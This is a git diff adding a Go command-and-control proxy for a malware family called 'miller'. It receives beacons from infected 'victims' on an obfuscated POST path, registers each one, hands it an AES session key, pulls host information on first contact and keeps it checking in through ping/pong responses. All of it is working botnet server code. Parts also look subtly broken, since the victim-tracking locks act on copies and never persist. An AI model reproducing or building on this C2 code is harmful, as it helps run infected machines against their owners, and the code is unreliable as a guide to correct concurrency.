6 files changed, 398 insertions, 0 deletions

diff --git a/source/tools/host/go/cncproxy/Makefile b/source/tools/host/go/cncproxy/Makefile
new file mode 100644
index 0000000..44e3b32
--- /dev/null
+++ b/source/tools/host/go/cncproxy/Makefile
@@ -0,0 +1,42 @@
+GOCC ?= go
+RM ?= rm
+GOPATH := $(shell realpath ./deps)
+INSTALL ?= install
+DESTDIR ?= .
+BIN := cncproxy
+ifeq ($(strip $(GOARCH)),)
+BIN := $(BIN)-host
+else
+BIN := $(BIN)-$(GOARCH)$(GOARM)
+endif
+SRCS := main.go manager.go http.go
+DEP_CNCLIB := ../cnclib/miller_consts.go ../cnclib/miller_victim.go
+DEP_MUX := deps/src/github.com/gorilla/mux/mux.go
+DEP_PACKER := deps/src/github.com/zhuangsirui/binpacker/packer.go
+
+all: $(BIN)
+
+%.go:
+
+$(DEP_MUX):
+	GOPATH=$(GOPATH) $(GOCC) get -v -u github.com/gorilla/mux
+
+$(DEP_PACKER):
+	GOPATH=$(GOPATH) $(GOCC) get -v github.com/zhuangsirui/binpacker
+
+$(BIN): $(DEP_MUX) $(DEP_PACKER) $(DEP_CNCLIB) $(SRCS)
+ifeq ($(strip $(IS_GCCGO)),)
+	GOPATH=$(GOPATH) $(GOCC) build -ldflags="-s -w" -o $(BIN) .
+else
+	GOPATH=$(GOPATH) $(GOCC) build -gccgoflags="-s -w -pthread" -o $(BIN) .
+endif
+
+$(BIN)-install: $(BIN)
+	$(INSTALL) -D $(BIN) $(DESTDIR)/$(BIN)
+
+install: $(BIN)-install
+
+clean:
+	$(RM) -f $(BIN) $(DESTDIR)/$(BIN)
+
+.PHONY: all
diff --git a/source/tools/host/go/cncproxy/deps/src/github.com/gorilla/mux b/source/tools/host/go/cncproxy/deps/src/github.com/gorilla/mux
new file mode 160000
+Subproject d83b6ffe499a29cc05fc977988d039285177962
diff --git a/source/tools/host/go/cncproxy/deps/src/github.com/zhuangsirui/binpacker b/source/tools/host/go/cncproxy/deps/src/github.com/zhuangsirui/binpacker
new file mode 160000
+Subproject 08a1b297435a414bec3ccf4215ff546dba41815
diff --git a/source/tools/host/go/cncproxy/http.go b/source/tools/host/go/cncproxy/http.go
new file mode 100644
index 0000000..8e82662
--- /dev/null
+++ b/source/tools/host/go/cncproxy/http.go
@@ -0,0 +1,224 @@
+package main
+
+import (
+    "../cnclib"
+    "github.com/gorilla/mux"
+
+    "fmt"
+    "log"
+    "io"
+    "net/http"
+    "encoding/binary"
+    "encoding/hex"
+    "crypto/rand"
+    "bytes"
+)
+
+
+func miller_to_master(v *miller.Victim, url *string) error {
+    _, err := v.ToJSON(false)
+    if err != nil {
+        return err
+    }
+    return nil
+}
+
+func miller_http_request(v *miller.Victim, r *http.Request) (bool, error) {
+    var valid bool
+    var req miller.HttpResp
+    var err error
+    read_form, err := r.MultipartReader()
+    if err != nil {
+        return false, err
+    }
+
+    for {
+        part, err := read_form.NextPart()
+        if err == io.EOF {
+            break
+        }
+
+        if part.FormName() == "upload" {
+            buf := new(bytes.Buffer)
+            buf.ReadFrom(part)
+            if verbose {
+                log.Printf("Request (upload; %d bytes):\n%s", len(buf.String()), hex.Dump(buf.Bytes()))
+            }
+            err = v.ParseRequest(buf.Bytes(), &req)
+            if err != nil {
+                return false, err
+            }
+            if verbose {
+                log.Printf("HTTP REQUEST(%v)", &req)
+            }
+            valid = true
+        }
+    }
+
+    if !valid {
+        return false, nil
+    }
+    return true, nil
+}
+
+func miller_randbytes(n int) ([]byte, error) {
+    b := make([]byte, n)
+    _, err := rand.Read(b)
+    if err != nil {
+       return nil, err
+   }
+
+   return b, nil
+}
+
+func miller_state_machine(v *miller.Victim, marker *string) ([]byte, error) {
+    var err error
+    var buffer []byte
+    var resp miller.HttpResp
+
+    err = miller.ParseMarkerResponse(&resp, []byte(*marker))
+    if err != nil {
+        return nil, err
+    }
+
+    log.Printf("Miller state machine got a '%s'", miller.RCtoString(v.Last_rc_rx))
+    switch v.Last_rc_rx {
+        case miller.RC_REGISTER:
+            resp.RespFlags = miller.RF_OK
+            resp.RespCode = miller.RC_REGISTER
+            resp_reg, err := NewRegisterResponse(5, v)
+            if err != nil {
+                return nil, err
+            }
+            buffer, err = v.BuildRegisterResponse(&resp, resp_reg, buffer)
+            if err != nil {
+                return nil, err
+            }
+            if v.Last_rf_rx == miller.RF_INITIAL && v.Requests == 1 {
+                log.Printf("FIRST CONTACT: Grabbing some information !!")
+                resp.RespFlags = miller.RF_AGAIN
+                resp.RespCode = miller.RC_INFO
+                buffer, err = v.BuildInfoResponse(&resp, buffer)
+            }
+        break
+        case miller.RC_INFO:
+            resp.RespFlags = miller.RF_OK
+            resp.RespCode = miller.RC_PING
+            resp_pong := NewPongResponse(5)
+            buffer, err = v.BuildPongResponse(&resp, &resp_pong, buffer)
+            if err != nil {
+                return nil, err
+            }
+        break
+        case miller.RC_PING:
+            resp.RespFlags = miller.RF_OK
+            resp.RespCode = miller.RC_PING
+            resp_pong := NewPongResponse(5)
+            buffer, err = v.BuildPongResponse(&resp, &resp_pong, buffer)
+            if err != nil {
+                return nil, err
+            }
+        break
+        default:
+            return nil, fmt.Errorf("invalid response code 0x%04X", v.Last_rc_rx)
+    }
+
+    return buffer, nil
+}
+
+func miller_http_handler(w http.ResponseWriter, r *http.Request) {
+    params := mux.Vars(r)
+    sid, ok := params["sid"]
+    if !ok {
+        return
+    }
+    marker, ok := params["marker"]
+    if !ok {
+        return
+    }
+    rnd, ok := params["rnd"]
+    if !ok {
+        return
+    }
+
+    fake_resp := miller.HttpResp{}
+    if r.ContentLength < int64(binary.Size(fake_resp)) {
+        log.Printf("Fake response has invalid size.")
+        http.NotFound(w, r)
+        return
+    }
+
+    if verbose {
+        log.Printf("---------- %s ----------", "REQUEST")
+    }
+    log.Printf("SID '%s' with MARKER '%s' and RND '%s'", sid, marker, rnd)
+
+    var err error
+    var v *miller.Victim
+    v = mgr.GetVictim(&sid)
+    if v == nil {
+        v = miller.NewVictim()
+        mgr.SetVictim(v, &sid)
+    }
+    if !mgr.PushVictim(&sid) {
+        log.Printf("ERROR Victim is already known to the Manager!")
+        http.NotFound(w, r)
+        return
+    }
+
+    valid, err := miller_http_request(v, r)
+    if err != nil {
+        log.Printf("ERROR miller_http_request: '%s'", err)
+    }
+    if !valid {
+        log.Printf("ERROR Victim HTTP Request was invalid!")
+        http.NotFound(w, r)
+        return
+    }
+
+    buffer, err := miller_state_machine(v, &marker)
+    if err != nil {
+        log.Printf("ERROR miller_state_machine: '%s'", err)
+    }
+    if buffer == nil {
+        log.Printf("ERROR binary buffer was empty after miller_state_machine")
+        http.NotFound(w, r)
+        return
+    }
+
+    if v.Last_rc_rx == miller.RC_REGISTER && v.Requests > 1 {
+        log.Printf("WARNING: Victim '%s' RE-REGISTERED !!", sid)
+    }
+
+    if verbose {
+        log.Printf("Response (%d bytes):\n%s", len(buffer), hex.Dump(buffer))
+        log.Printf("VICTIM STATE(%s)", v)
+        json_out, err := v.ToJSON(true)
+        if err == nil {
+            log.Printf("VICTIM JSON(%s)", string(json_out))
+        }
+        log.Printf("---------- %s ----------", "EoF REQUEST/RESPONSE")
+    }
+
+    mgr.PopVictim(&sid)
+
+    w.Write(buffer)
+}
+
+func NewRegisterResponse(next_ping uint32, victim *miller.Victim) (*miller.RespRegister, error) {
+    respreg := miller.RespRegister{ [miller.AESKEY_SIZ]byte{}, next_ping }
+    aeskey, err := miller_randbytes(int(miller.KEY_256))
+    if err != nil {
+        return nil, err
+    }
+    err = miller.ParseAESKeyResponse(&respreg, aeskey)
+    if err != nil {
+        return nil, err
+    }
+    victim.SetAESKey(aeskey)
+    return &respreg, nil
+}
+
+func NewPongResponse(next_ping uint32) miller.RespPong {
+    return miller.RespPong{ next_ping }
+}
diff --git a/source/tools/host/go/cncproxy/main.go b/source/tools/host/go/cncproxy/main.go
new file mode 100644
index 0000000..b5cc9ef
--- /dev/null
+++ b/source/tools/host/go/cncproxy/main.go
@@ -0,0 +1,48 @@
+package main
+
+import (
+    "github.com/gorilla/mux"
+
+    "flag"
+    "log"
+    "net/http"
+)
+
+
+var mgr manager
+var verbose bool
+
+const default_listen_tpl = "127.0.0.1:8080"
+const default_master_tpl = "127.0.0.1:8081"
+const default_verbose = false
+
+
+func main() {
+    listen_tpl := flag.String("listen", default_listen_tpl,
+                              "CNCProxy listen address.")
+    master_tpl := flag.String("master", default_master_tpl,
+                              "CNCMaster connect address.")
+    verbose = *flag.Bool("verbose", default_verbose,
+                         "CNCProxy verbose mode")
+    flag.Parse()
+
+    mgr = NewManager()
+    rtr := mux.NewRouter()
+    /* /.miller_pahhj0099wjtu87vdgtl8fq8k4zmh0is_sbmkuj97_rg38n6bop9m5htrbeyyx0ljx26gbjxdx5nztp4a1wfowdsyyqnzts0r440logk91 */
+    rtr.HandleFunc("/.miller_{sid:[a-zA-Z0-9]{32}}_{marker:[a-zA-Z0-9]{8}}_{rnd:[a-zA-Z0-9]{64}}", miller_http_handler).Methods("POST")
+
+    http.Handle("/", rtr)
+
+    log.Println("CNCProxy: Listening on " + *listen_tpl + "...")
+    log.Println("CNCProxy: Forwarding to CNCMaster at " + *master_tpl)
+    log.Fatal(http.ListenAndServe(*listen_tpl, logRequest(http.DefaultServeMux)))
+}
+
+func logRequest(handler http.Handler) http.Handler {
+    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+        if verbose {
+            log.Printf("%s %s %s\n", r.RemoteAddr, r.Method, r.URL)
+        }
+        handler.ServeHTTP(w, r)
+    })
+}
diff --git a/source/tools/host/go/cncproxy/manager.go b/source/tools/host/go/cncproxy/manager.go
new file mode 100644
index 0000000..cd778be
--- /dev/null
+++ b/source/tools/host/go/cncproxy/manager.go
@@ -0,0 +1,84 @@
+package main
+
+import (
+    "../cnclib"
+
+    "sync"
+)
+
+type victim_data struct {
+    v       *miller.Victim
+    in_use  bool
+    lock    sync.Mutex
+}
+
+type manager struct {
+    victims map[string]victim_data
+    lock sync.Mutex
+}
+
+
+func NewManager() manager {
+    return manager{ make(map[string]victim_data), sync.Mutex{} }
+}
+
+func (m *manager) SetVictim(v *miller.Victim, sid *string) {
+    m.lock.Lock()
+    defer m.lock.Unlock()
+    vd := victim_data{}
+    vd.v = v
+    m.victims[*sid] = vd
+}
+
+func (m *manager) getVictim(sid *string) *victim_data {
+    m.lock.Lock()
+    defer m.lock.Unlock()
+    ret, ok := m.victims[*sid]
+    if ok {
+        return &ret
+    }
+    return nil
+}
+
+func (m *manager) GetVictim(sid *string) *miller.Victim {
+    vd := m.getVictim(sid)
+    if vd == nil {
+        return nil
+    }
+    if !m.VictimInUse(sid) {
+        return vd.v
+    }
+    return nil
+}
+
+func (m *manager) VictimInUse(sid *string) bool {
+    vd := m.getVictim(sid)
+    if vd == nil {
+        return false
+    }
+    vd.lock.Lock()
+    defer vd.lock.Unlock()
+    return vd.in_use
+}
+
+func (m *manager) PushVictim(sid *string) bool {
+    if m.VictimInUse(sid) {
+        return false
+    }
+    vd := m.getVictim(sid)
+    vd.lock.Lock()
+    defer vd.lock.Unlock()
+    vd.in_use = true
+    return true
+}
+
+func (m *manager) PopVictim(sid *string) bool {
+    if !m.VictimInUse(sid) {
+        return false
+    }
+    vd := m.getVictim(sid)
+    vd.lock.Lock()
+    defer vd.lock.Unlock()
+    vd.in_use = false
+    return true
+}